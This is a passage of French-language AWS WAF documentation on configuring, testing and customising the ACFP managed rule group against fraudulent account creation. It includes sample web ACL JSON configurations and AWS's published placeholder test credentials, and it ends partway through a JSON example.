+ **Journalisation et métriques** : vous pouvez surveiller votre trafic et comprendre comment le groupe de règles géré par l'ACFP l'affecte, en configurant et en activant les journaux, la collecte de données Amazon Security Lake et les CloudWatch métriques Amazon pour votre pack de protection (ACL Web). Les étiquettes ajoutées `AWSManagedRulesACFPRuleSet` à vos requêtes Web sont incluses dans les données. Pour plus d'informations sur les options[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md), consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md), et [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) .

  En fonction de vos besoins et du trafic que vous constatez, vous souhaiterez peut-être personnaliser votre `AWSManagedRulesACFPRuleSet` implémentation. Par exemple, vous souhaiterez peut-être exclure une partie du trafic de l'évaluation de l'ACFP ou modifier la façon dont il gère certaines tentatives de fraude liées à la création de comptes qu'il identifie, en utilisant des AWS WAF fonctionnalités telles que les déclarations de portée réduite ou les règles de correspondance des étiquettes. 
+ **Étiquettes et règles de correspondance des étiquettes** : pour toutes les règles `AWSManagedRulesACFPRuleSet` incluses, vous pouvez modifier le comportement de blocage pour qu'il soit comptabilisé, puis le comparer aux étiquettes ajoutées par les règles. Utilisez cette approche pour personnaliser la façon dont vous gérez les demandes Web identifiées par le groupe de règles géré par l'ACFP. Pour plus d'informations sur l'étiquetage et l'utilisation des instructions de correspondance des étiquettes, consultez [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md) et[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md). 
+ **Demandes et réponses personnalisées** : vous pouvez ajouter des en-têtes personnalisés aux demandes que vous autorisez et vous pouvez envoyer des réponses personnalisées pour les demandes que vous bloquez. Pour ce faire, vous associez votre étiquette correspondante aux fonctionnalités de demande et de réponse AWS WAF personnalisées. Pour plus d'informations sur la personnalisation des demandes et des réponses, consultez[Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

# Utilisation de l'intégration d'applications SDKs avec ACFP
<a name="waf-acfp-with-tokens"></a>

Nous vous recommandons vivement de mettre en œuvre l'intégration de l' SDKsapplication afin d'utiliser le plus efficacement possible le groupe de règles ACFP. 
+ **Fonctionnalité complète du groupe de règles** : la règle ACFP `SignalClientHumanInteractivityAbsentLow` ne fonctionne qu'avec les jetons renseignés par les intégrations d'applications. Cette règle détecte et gère l'interactivité humaine anormale avec la page de l'application. L'intégration de l'application SDKs permet de détecter l'interactivité humaine normale par le biais des mouvements de la souris, des pressions sur les touches et d'autres mesures. Les interstitiels envoyés par les règles agissent CAPTCHA et ne Challenge peuvent pas fournir ce type de données. 
+ **Latence réduite** : la règle du groupe de règles `AllRequests` applique l'action de la Challenge règle à toute demande qui ne comporte pas encore de jeton de défi. Dans ce cas, la demande est évaluée deux fois par le groupe de règles : une fois sans le jeton, puis une seconde fois après l'acquisition du jeton au moyen de l'Challengeaction interstitielle. Aucuns frais supplémentaires ne vous sont facturés pour la seule utilisation de la `AllRequests` règle, mais cette approche alourdit votre trafic Web et augmente la latence de votre expérience utilisateur final. Si vous acquérez le jeton côté client à l'aide des intégrations d'applications, le groupe de règles ACFP évalue la demande une fois avant d'envoyer la demande de création de compte. 

Pour plus d'informations sur les fonctionnalités des groupes de règles, consultez[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).

Pour plus d'informations sur le SDKs, voir[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur AWS WAF les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Pour plus d'informations sur les actions des règles, consultez[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

# Ajouter le groupe de règles géré par l'ACFP à votre ACL Web
<a name="waf-acfp-rg-using"></a>

Cette section explique comment ajouter et configurer le groupe de `AWSManagedRulesACFPRuleSet` règles.

Pour configurer le groupe de règles géré par l'ACFP afin de reconnaître les activités frauduleuses liées à la création de compte dans votre trafic Web, vous fournissez des informations sur la manière dont les clients accèdent à votre page d'inscription et envoient des demandes de création de compte à votre application. Pour les CloudFront distributions Amazon protégées, vous fournissez également des informations sur la manière dont votre application répond aux demandes de création de compte. Cette configuration s'ajoute à la configuration normale d'un groupe de règles géré. 

Pour la description du groupe de règles et la liste des règles, voir[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).

**Note**  
La base de données d'identification volées de l'ACFP ne contient que des noms d'utilisateur au format e-mail.

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. Pour obtenir des informations de base sur l'ajout d'un groupe de règles géré à votre pack de protection (ACL Web), consultez[Ajout d'un groupe de règles géré à un pack de protection (ACL Web) via la console](waf-using-managed-rule-group.md).

**Suivez les meilleures pratiques**  
Utilisez le groupe de règles ACFP conformément aux meilleures pratiques de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md). 

**Pour utiliser le groupe de `AWSManagedRulesACFPRuleSet` règles dans votre pack de protection (ACL Web)**

1. Ajoutez le groupe de règles AWS géré `AWSManagedRulesACFPRuleSet` à votre pack de protection (ACL Web) et **modifiez** les paramètres du groupe de règles avant de l'enregistrer. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

1. Dans le volet de **configuration du groupe de règles**, fournissez les informations que le groupe de règles ACFP utilise pour inspecter les demandes de création de compte. 

   1. Pour **Utiliser une expression régulière dans les chemins**, activez cette option si vous souhaitez effectuer une correspondance AWS WAF d'expressions régulières pour les spécifications du chemin de page d'enregistrement et de création de compte. 

      AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

   1. Pour le **chemin de la page d'enregistrement**, indiquez le chemin du point de terminaison de la page d'enregistrement de votre application. Cette page doit accepter les `GET` text/html demandes. Le groupe de règles inspecte uniquement les `GET` text/html requêtes HTTP adressées au point de terminaison de la page d'enregistrement que vous avez spécifiée.
**Note**  
La correspondance entre les points de terminaison ne fait pas la distinction majuscules/minuscules. Les spécifications Regex ne doivent pas contenir l'indicateur`(?-i)`, qui désactive la mise en correspondance insensible aux majuscules et minuscules. Les spécifications de chaîne doivent commencer par une barre oblique`/`.

      Par exemple, pour l'URL`https://example.com/web/registration`, vous pouvez fournir la spécification du chemin de chaîne`/web/registration`. Les chemins de page d'inscription qui commencent par le chemin que vous avez indiqué sont considérés comme correspondants. Par exemple, `/web/registration` correspond aux chemins d'enregistrement `/web/registration` `/web/registration/``/web/registrationPage`,, et`/web/registration/thisPage`, mais ne correspond pas au chemin `/home/web/registration` ou`/website/registration`. 
**Note**  
Assurez-vous que vos utilisateurs finaux chargent la page d'inscription avant de soumettre une demande de création de compte. Cela permet de garantir que les demandes de création de compte émanant du client incluent des jetons valides. 

   1. Pour le **chemin de création du compte**, indiquez l'URI de votre site Web qui accepte les informations des nouveaux utilisateurs complétées. Cet URI doit accepter les `POST` demandes.
**Note**  
La correspondance entre les points de terminaison ne fait pas la distinction majuscules/minuscules. Les spécifications Regex ne doivent pas contenir l'indicateur`(?-i)`, qui désactive la mise en correspondance insensible aux majuscules et minuscules. Les spécifications de chaîne doivent commencer par une barre oblique`/`.

      Par exemple, pour l'URL`https://example.com/web/newaccount`, vous pouvez fournir la spécification du chemin de chaîne`/web/newaccount`. Les chemins de création de compte qui commencent par le chemin que vous avez indiqué sont considérés comme correspondants. Par exemple, `/web/newaccount` correspond aux chemins de création de compte `/web/newaccount` `/web/newaccount/``/web/newaccountPage`,, et`/web/newaccount/thisPage`, mais ne correspond pas au chemin `/home/web/newaccount` ou`/website/newaccount`. 

   1. Pour **l'inspection des demandes**, spécifiez comment votre application accepte les tentatives de création de compte en fournissant le type de charge utile de la demande et les noms des champs du corps de la demande dans lesquels le nom d'utilisateur, le mot de passe et les autres informations de création de compte sont fournis. 
**Note**  
Pour les champs d'adresse principale et de numéro de téléphone, indiquez les champs dans l'ordre dans lequel ils apparaissent dans la charge utile de la demande.

      La spécification des noms de champs dépend du type de charge utile.
      + **Type de charge utile JSON** — Spécifiez les noms des champs dans la syntaxe du pointeur JSON. Pour plus d'informations sur la syntaxe du pointeur JSON, consultez la documentation du pointeur [JSON (JavaScriptObject Notation) de l'Internet Engineering Task Force (IETF)](https://tools.ietf.org/html/rfc6901). 

        Par exemple, pour l'exemple de charge utile JSON suivant, la spécification du champ du nom d'utilisateur est `/signupform/username` et les spécifications du champ d'adresse principal sont `/signupform/addrp1``/signupform/addrp2`, et`/signupform/addrp3`.

        ```
        {
            "signupform": {
                "username": "THE_USERNAME",
                "password": "THE_PASSWORD",
                "addrp1": "PRIMARY_ADDRESS_LINE_1",
                "addrp2": "PRIMARY_ADDRESS_LINE_2",
                "addrp3": "PRIMARY_ADDRESS_LINE_3",
                "phonepcode": "PRIMARY_PHONE_CODE",
                "phonepnumber": "PRIMARY_PHONE_NUMBER"
            }
        }
        ```
      + **Type de charge utile FORM\$1ENCODED** — Utilisez les noms des formulaires HTML.

        Par exemple, pour un formulaire HTML dont les éléments de saisie d'utilisateur et de mot de passe sont nommés `username1` et`password1`, la spécification du champ du nom d'utilisateur est `username1` et celle du champ du mot de passe est`password1`.

   1. Si vous protégez des CloudFront distributions Amazon, dans la section **Inspection des réponses**, précisez comment votre application indique le succès ou l'échec de ses réponses aux tentatives de création de compte. 
**Note**  
L'inspection des réponses ACFP n'est disponible que dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions.

      Spécifiez un seul composant dans la réponse de création de compte que vous souhaitez que l'ACFP inspecte. Pour les types de composants **Body** et **JSON**, AWS WAF vous pouvez inspecter les 65 536 premiers octets (64 Ko) du composant. 

      Indiquez vos critères d'inspection pour le type de composant, comme indiqué par l'interface. Vous devez fournir des critères de réussite et d'échec à inspecter dans le composant. 

      Supposons, par exemple, que votre application indique le statut d'une tentative de création de compte dans le code d'état de la réponse et qu'`200 OK`elle indique le succès `401 Unauthorized` et/ou `403 Forbidden` l'échec. Vous devez définir le **type de composant** d'inspection des réponses sur **Code d'état**, puis dans la zone de texte **Succès**, entrez `200` et dans la zone de texte **Échec**, entrez `401` sur la première ligne et `403` sur la seconde.

      Le groupe de règles ACFP ne compte que les réponses correspondant à vos critères de réussite ou d'échec de l'inspection. Les règles des groupes de règles agissent sur les clients lorsque leur taux de réussite est trop élevé parmi les réponses prises en compte, afin de limiter les tentatives de création de comptes en masse. Pour respecter correctement les règles du groupe de règles, veillez à fournir des informations complètes sur les tentatives de création de compte réussies et infructueuses. 

      Pour voir les règles qui contrôlent les réponses relatives à la création de comptes, recherchez `VolumetricIPSuccessfulResponse` et `VolumetricSessionSuccessfulResponse` dans la liste des règles à l'adresse[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md). 

1. Fournissez toute configuration supplémentaire que vous souhaitez pour le groupe de règles. 

   Vous pouvez limiter davantage l'étendue des demandes inspectées par le groupe de règles en ajoutant une instruction scope-down à l'instruction du groupe de règles géré. Par exemple, vous ne pouvez inspecter que les demandes contenant un argument de requête ou un cookie spécifique. Le groupe de règles inspectera uniquement les demandes qui répondent aux critères de votre déclaration de délimitation et qui sont envoyées aux chemins d'enregistrement et de création de compte que vous avez spécifiés dans la configuration du groupe de règles. Pour plus d'informations sur les instructions de portée réduite, consultez. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

1. Enregistrez les modifications apportées au pack de protection (ACL Web). 

Avant de déployer votre implémentation ACFP pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. Consultez la section qui suit pour obtenir des conseils. 

# Test et déploiement de l'ACFP
<a name="waf-acfp-deploying"></a>

Cette section fournit des conseils généraux pour configurer et tester une implémentation de prévention de AWS WAF la fraude (ACFP) lors de la création de comptes Fraud Control pour votre site. Les étapes spécifiques que vous choisirez de suivre dépendront de vos besoins, des ressources et des demandes Web que vous recevrez. 

Ces informations s'ajoutent aux informations générales sur les tests et le réglage fournies sur[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

**Risque lié au trafic de production**  
Avant de déployer votre implémentation ACFP pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. 

AWS WAF fournit des informations d'identification de test que vous pouvez utiliser pour vérifier votre configuration ACFP. Dans la procédure suivante, vous allez configurer un pack de protection test (ACL Web) pour utiliser le groupe de règles géré par l'ACFP, configurer une règle pour capturer l'étiquette ajoutée par le groupe de règles, puis exécuter une tentative de création de compte à l'aide de ces informations d'identification de test. Vous allez vérifier que votre pack de protection (ACL Web) a correctement géré la tentative en vérifiant les CloudWatch statistiques Amazon relatives à la tentative de création de compte. 

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. 

**Pour configurer et tester une implémentation de la prévention des AWS WAF fraudes (ACFP) lors de la création de comptes de contrôle des fraudes**

Effectuez ces étapes d'abord dans un environnement de test, puis en production.

1. 

**Ajouter le groupe de règles géré par AWS WAF Fraud Control pour la création de comptes et la prévention des fraudes (ACFP) en mode décompte**
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

   Ajoutez le groupe de règles AWS gérées `AWSManagedRulesACFPRuleSet` à un pack de protection (ACL Web) nouveau ou existant et configurez-le de manière à ce qu'il ne modifie pas le comportement actuel du pack de protection (ACL Web). Pour plus de détails sur les règles et les libellés de ce groupe de règles, consultez[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).
   + Lorsque vous ajoutez le groupe de règles géré, modifiez-le et procédez comme suit : 
     + Dans le volet de **configuration du groupe de règles**, fournissez les détails des pages d'enregistrement et de création de compte de votre application. Le groupe de règles ACFP utilise ces informations pour surveiller les activités de connexion. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md).
     + Dans le volet **Règles**, ouvrez le menu déroulant **Remplacer toutes les actions des règles** et choisissez. **Count** Avec cette configuration, AWS WAF évalue les demandes par rapport à toutes les règles du groupe de règles et ne compte que les correspondances qui en résultent, tout en ajoutant des étiquettes aux demandes. Pour de plus amples informations, veuillez consulter [Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

       Grâce à cette dérogation, vous pouvez surveiller l'impact potentiel des règles gérées par l'ACFP afin de déterminer si vous souhaitez ajouter des exceptions, telles que des exceptions pour des cas d'utilisation internes. 
   + Positionnez le groupe de règles de manière à ce qu'il soit évalué selon vos règles existantes dans le pack de protection (ACL Web), avec un paramètre de priorité supérieur à celui des règles ou groupes de règles que vous utilisez déjà. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

     De cette façon, votre gestion actuelle du trafic n'est pas perturbée. Par exemple, si vous avez des règles qui détectent le trafic malveillant tel que l'injection SQL ou les scripts intersites, elles continueront à le détecter et à le consigner. Par ailleurs, si vous avez des règles qui autorisent le trafic connu non malveillant, elles peuvent continuer à autoriser ce trafic, sans qu'il soit bloqué par le groupe de règles géré par l'ACFP. Vous pouvez décider d'ajuster l'ordre de traitement lors de vos activités de test et de réglage.

1. 

**Mettre en œuvre l'intégration de l'application SDKs**

   Intégrez le AWS WAF JavaScript SDK dans les processus d'enregistrement et de création de compte de votre navigateur. AWS WAF fournit également un mobile SDKs pour intégrer les appareils iOS et Android. Pour plus d'informations sur l'intégration SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur cette recommandation, consultez[Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md).
**Note**  
Si vous ne parvenez pas à utiliser l'intégration de l'application SDKs, il est possible de tester le groupe de règles ACFP en le modifiant dans votre pack de protection (ACL Web) et en supprimant la dérogation que vous avez accordée à la `AllRequests` règle. Cela active le paramètre Challenge d'action de la règle, afin de garantir que les demandes incluent un jeton de défi valide.   
*Faites-le d'abord dans un environnement de test, puis avec le plus grand soin dans votre environnement de production.* Cette approche est susceptible de bloquer des utilisateurs. Par exemple, si le chemin de votre page d'inscription n'accepte pas les `GET` text/html demandes, cette configuration de règles peut bloquer efficacement toutes les demandes sur la page d'enregistrement. 

1. 

**Activer la journalisation et les métriques pour le pack de protection (ACL Web)**

   Le cas échéant, configurez la journalisation, la collecte de données Amazon Security Lake, l'échantillonnage des demandes et CloudWatch les métriques Amazon pour le pack de protection (ACL Web). Vous pouvez utiliser ces outils de visibilité pour surveiller l'interaction du groupe de règles géré par l'ACFP avec votre trafic. 
   + Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
   + Pour plus d'informations sur Amazon Security Lake, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 
   + Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 
   + Pour plus d'informations sur l'échantillonnage des requêtes Web, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

1. 

**Associer le pack de protection (ACL Web) à une ressource**

   Si le pack de protection (ACL Web) n'est pas déjà associé à une ressource de test, associez-le. Pour plus d'informations, consultez [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

1. 

**Surveillez le trafic et les correspondances aux règles ACFP**

   Assurez-vous que votre trafic normal circule et que les règles du groupe de règles géré par l'ACFP ajoutent des étiquettes aux requêtes Web correspondantes. Vous pouvez voir les étiquettes dans les journaux, ainsi que l'ACFP et les métriques relatives aux étiquettes dans les CloudWatch métriques Amazon. Dans les journaux, les règles que vous avez remplacées pour être prises en compte dans le groupe de règles apparaissent dans le `ruleGroupList` champ « `action` set to count » et `overriddenAction` indiquent l'action de règle configurée que vous avez remplacée. 

1. 

**Testez les capacités de vérification des informations d'identification du groupe de règles**

   Effectuez une tentative de création de compte en testant les informations d'identification compromises et vérifiez que le groupe de règles correspond à celles-ci comme prévu. 

   1. Accédez à la page d'enregistrement du compte de votre ressource protégée et essayez d'ajouter un nouveau compte. Utilisez la paire d'identifiants de AWS WAF test suivante et participez à n'importe quel test 
      + Utilisateur : `WAF_TEST_CREDENTIAL@wafexample.com`
      + Mot de passe : `WAF_TEST_CREDENTIAL_PASSWORD`

      Ces informations d'identification de test sont classées dans la catégorie des informations d'identification compromises, et le groupe de règles géré par l'ACFP ajoutera l'`awswaf:managed:aws:acfp:signal:credential_compromised`étiquette à la demande de création de compte, que vous pouvez consulter dans les journaux. 

   1. Dans les journaux de votre pack de protection (ACL Web), recherchez l'`awswaf:managed:aws:acfp:signal:credential_compromised`étiquette dans le `labels` champ des entrées du journal pour votre demande de création de compte de test. Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

   Après avoir vérifié que le groupe de règles capture les informations d'identification compromises comme prévu, vous pouvez prendre des mesures pour configurer sa mise en œuvre en fonction de vos besoins pour votre ressource protégée.

1. 

**Pour les CloudFront distributions, testez la gestion par le groupe de règles des tentatives de création de comptes en masse**

   Exécutez ce test pour chaque critère de réponse positive que vous avez configuré pour le groupe de règles ACFP. Attendez au moins 30 minutes entre les tests.

   1. Pour chacun de vos critères de succès, identifiez une tentative de création de compte qui sera couronnée de succès avec ce critère de succès dans la réponse. Ensuite, à partir d'une seule session client, effectuez au moins 5 tentatives de création de compte réussies en moins de 30 minutes. Un utilisateur ne crée normalement qu'un seul compte sur votre site. 

      Une fois la première création de compte réussie, la `VolumetricSessionSuccessfulResponse` règle devrait commencer à correspondre aux autres réponses à la création de votre compte, à les étiqueter et à les compter, en fonction de votre dérogation à l'action de la règle. Il se peut que la règle omette le premier ou les deux premiers en raison de la latence. 

   1. Dans les journaux de votre pack de protection (ACL Web), recherchez l'`awswaf:managed:aws:acfp:aggregate:volumetric:session:successful_creation_response:high`étiquette dans le `labels` champ des entrées du journal pour vos demandes Web de création de compte de test. Pour plus d’informations sur la journalisation, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

   Ces tests vérifient que vos critères de réussite correspondent à vos réponses en vérifiant que le nombre de réussites agrégés par la règle dépasse le seuil de la règle. Une fois le seuil atteint, si vous continuez à envoyer des demandes de création de compte depuis la même session, la règle continuera de correspondre jusqu'à ce que le taux de réussite tombe en dessous du seuil. Lorsque le seuil est dépassé, la règle fait correspondre les tentatives de création de compte réussies ou non à partir de l'adresse de session. 

1. 

**Personnaliser le traitement des requêtes Web ACFP**

   Le cas échéant, ajoutez vos propres règles qui autorisent ou bloquent explicitement les demandes, afin de modifier la façon dont les règles ACFP les traiteraient autrement. 

   Par exemple, vous pouvez utiliser les étiquettes ACFP pour autoriser ou bloquer les demandes ou pour personnaliser le traitement des demandes. Vous pouvez ajouter une règle de correspondance d'étiquettes après le groupe de règles géré par l'ACFP afin de filtrer les demandes étiquetées pour le traitement que vous souhaitez appliquer. Après le test, maintenez les règles ACFP associées en mode décompte et conservez les décisions relatives au traitement des demandes dans votre règle personnalisée. Pour obtenir un exemple, consultez [Exemple ACFP : réponse personnalisée pour des informations d'identification compromises](waf-acfp-control-example-compromised-credentials.md). 

1. 

**Supprimez vos règles de test et activez les paramètres du groupe de règles géré par l'ACFP**

   Selon votre situation, vous avez peut-être décidé de laisser certaines règles ACFP en mode décompte. Pour les règles que vous souhaitez exécuter telles que configurées au sein du groupe de règles, désactivez le mode de comptage dans la configuration du groupe de règles du pack de protection (ACL Web). Lorsque vous avez terminé le test, vous pouvez également supprimer les règles de correspondance de vos étiquettes de test.

1. 

**Surveillez et réglez**

   Pour vous assurer que les requêtes Web sont traitées comme vous le souhaitez, surveillez attentivement votre trafic après avoir activé la fonctionnalité ACFP que vous souhaitez utiliser. Ajustez le comportement selon vos besoins en annulant le nombre de règles sur le groupe de règles et en appliquant vos propres règles. 

Une fois que vous avez terminé de tester l'implémentation de votre groupe de règles ACFP, si vous n'avez pas encore intégré le AWS WAF JavaScript SDK dans les pages d'enregistrement et de création de compte de votre navigateur, nous vous recommandons vivement de le faire. AWS WAF fournit également un mobile SDKs pour intégrer les appareils iOS et Android. Pour plus d'informations sur l'intégration SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur cette recommandation, consultez[Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md).

# AWS WAF Exemples de création de comptes Fraud Control et de prévention de la fraude (ACFP)
<a name="waf-acfp-control-examples"></a>

Cette section présente des exemples de configurations qui répondent aux cas d'utilisation courants pour les implémentations de création de comptes AWS WAF Fraud Control et de prévention de la fraude (ACFP). 

Chaque exemple fournit une description du cas d'utilisation, puis montre la solution dans les listes JSON pour les règles configurées personnalisées. 

**Note**  
Vous pouvez récupérer des listes JSON telles que celles présentées dans ces exemples via le téléchargement du pack de protection de la console (ACL Web) ou l'éditeur JSON de règles, ou via l'`getWebACL`opération dans l'interface de ligne de commande APIs et l'interface de ligne de commande. 

**Topics**
+ [Exemple ACFP : configuration simple](waf-acfp-control-example-basic.md)
+ [Exemple ACFP : réponse personnalisée pour des informations d'identification compromises](waf-acfp-control-example-compromised-credentials.md)
+ [Exemple ACFP : configuration de l'inspection des réponses](waf-acfp-control-example-response-inspection.md)

# Exemple ACFP : configuration simple
<a name="waf-acfp-control-example-basic"></a>

La liste JSON suivante montre un exemple de pack de protection (ACL Web) avec un groupe de règles géré par AWS WAF Fraud Control pour la création de comptes et la prévention des fraudes (ACFP). Notez les `RegistrationPagePath` configurations supplémentaires`CreationPath`, ainsi que le type de charge utile et les informations nécessaires pour localiser les nouvelles informations de compte dans la charge utile, afin de les vérifier. Le groupe de règles utilise ces informations pour surveiller et gérer vos demandes de création de compte. Ce JSON inclut les paramètres générés automatiquement par le pack de protection (ACL Web), tels que l'espace de noms des étiquettes et l'URL d'intégration des applications du pack de protection (ACL Web).

```
{
  "Name": "simpleACFP",
  "Id": "... ",
  "ARN": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/simpleACFP/... ",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesACFPRuleSet",
      "Priority": 0,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesACFPRuleSet",
          "ManagedRuleGroupConfigs": [
            {
              "AWSManagedRulesACFPRuleSet": {
                "CreationPath": "/web/signup/submit-registration",
                "RegistrationPagePath": "/web/signup/registration",
                "RequestInspection": {
                  "PayloadType": "JSON",
                  "UsernameField": {
                    "Identifier": "/form/username"
                  },
                  "PasswordField": {
                    "Identifier": "/form/password"
                  },
                  "EmailField": {
                    "Identifier": "/form/email"
                  },
                  "PhoneNumberFields": [
                    {
                      "Identifier": "/form/country-code"
                    },
                    {
                      "Identifier": "/form/region-code"
                    },
                    {
                      "Identifier": "/form/phonenumber"
                    }
                  ],
                  "AddressFields": [
                    {
                      "Identifier": "/form/name"
                    },
                    {
                      "Identifier": "/form/street-address"
                    },
                    {
                      "Identifier": "/form/city"
                    },
                    {
                      "Identifier": "/form/state"
                    },
                    {
                      "Identifier": "/form/zipcode"
                    }
                  ]
                },
                "EnableRegexInPath": false
              }
            }
          ]
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesACFPRuleSet"
      }
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "simpleACFP"
  },
  "Capacity": 50,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:111122223333:webacl:simpleACFP:"
}
```

# Exemple ACFP : réponse personnalisée pour des informations d'identification compromises
<a name="waf-acfp-control-example-compromised-credentials"></a>

Par défaut, la vérification des informations d'identification effectuée par le groupe de règles `AWSManagedRulesACFPRuleSet` traite les informations d'identification compromises en étiquetant la demande et en la bloquant. Pour plus de détails sur le groupe de règles et le comportement des règles, consultez[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).

Pour informer l'utilisateur que les informations d'identification du compte qu'il a fournies ont été compromises, vous pouvez procéder comme suit : 
+ **Remplacer la `SignalCredentialCompromised` règle** par Count : la règle ne compte et n'étiquette que les demandes correspondantes.
+ **Ajouter une règle de correspondance des étiquettes avec gestion personnalisée** : configurez cette règle pour qu'elle corresponde à l'étiquette ACFP et pour effectuer votre gestion personnalisée. 

Les listes de packs de protection (ACL Web) suivantes indiquent le groupe de règles géré par l'ACFP dans l'exemple précédent, l'action de la `SignalCredentialCompromised` règle étant remplacée pour compter. Avec cette configuration, lorsque ce groupe de règles évalue une demande Web utilisant des informations d'identification compromises, il étiquette la demande, mais ne la bloque pas. 

En outre, le pack de protection (ACL Web) possède désormais une réponse personnalisée nommée `aws-waf-credential-compromised` et une nouvelle règle nommée`AccountSignupCompromisedCredentialsHandling`. La priorité de la règle est un paramètre numérique supérieur à celui du groupe de règles. Elle s'exécute donc après le groupe de règles dans l'évaluation du pack de protection (ACL Web). La nouvelle règle associe toutes les demandes à l'étiquette d'identification compromise du groupe de règles. Lorsque la règle trouve une correspondance, elle applique l'Blockaction à la demande avec le corps de réponse personnalisé. Le corps de réponse personnalisé indique à l'utilisateur final que ses informations d'identification ont été compromises et propose une action à entreprendre. 

```
{
  "Name": "compromisedCreds",
  "Id": "... ",
  "ARN": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/compromisedCreds/...",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesACFPRuleSet",
